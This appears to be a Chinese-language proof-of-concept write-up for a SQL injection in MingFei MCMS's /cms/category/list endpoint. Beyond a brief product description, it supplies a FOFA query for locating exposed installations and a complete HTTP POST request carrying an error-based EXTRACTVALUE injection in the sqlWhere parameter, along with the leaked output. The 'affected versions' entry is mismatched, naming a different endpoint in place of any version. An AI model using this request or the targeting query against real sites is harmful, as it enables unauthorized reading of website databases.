铭飞CMS category-list存在SQL注入漏洞
一、漏洞简介
铭飞CMS是一款功能强大的内容管理系统。它提供了可靠的网站建设和内容发布解决方案,帮助用户轻松创建、编辑和管理网页内容。铭飞CMS具有直观的用户界面和丰富的功能,包括模板管理、文章发布、多媒体支持、用户权限控制等。它支持多平台部署,并且具有良好的扩展性和定制性,可以满足各种不同规模和需求的网站构建。铭飞CMS还提供了安全性和稳定性,保证网站数据的可靠性和隐私保护。铭飞CMS category-list存在SQL注入漏洞。
二、影响版本
- 铭飞CMS dict-list存在SQL注入漏洞
三、资产测绘
- fofa
(body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js")
- 特征
四、漏洞复现
POST /cms/category/list HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
sqlWhere=[{"action"%3a"","field"%3a"1+AND+EXTRACTVALUE(4095,CONCAT(0x5c,0x717a6a6271,(select md5(1)),0x716b6a7871))","el":"eq","model":"contentTitle","name":"123","type":"input","value":"a"}]
qzjbqc4ca4238a0b923820dcc509a6f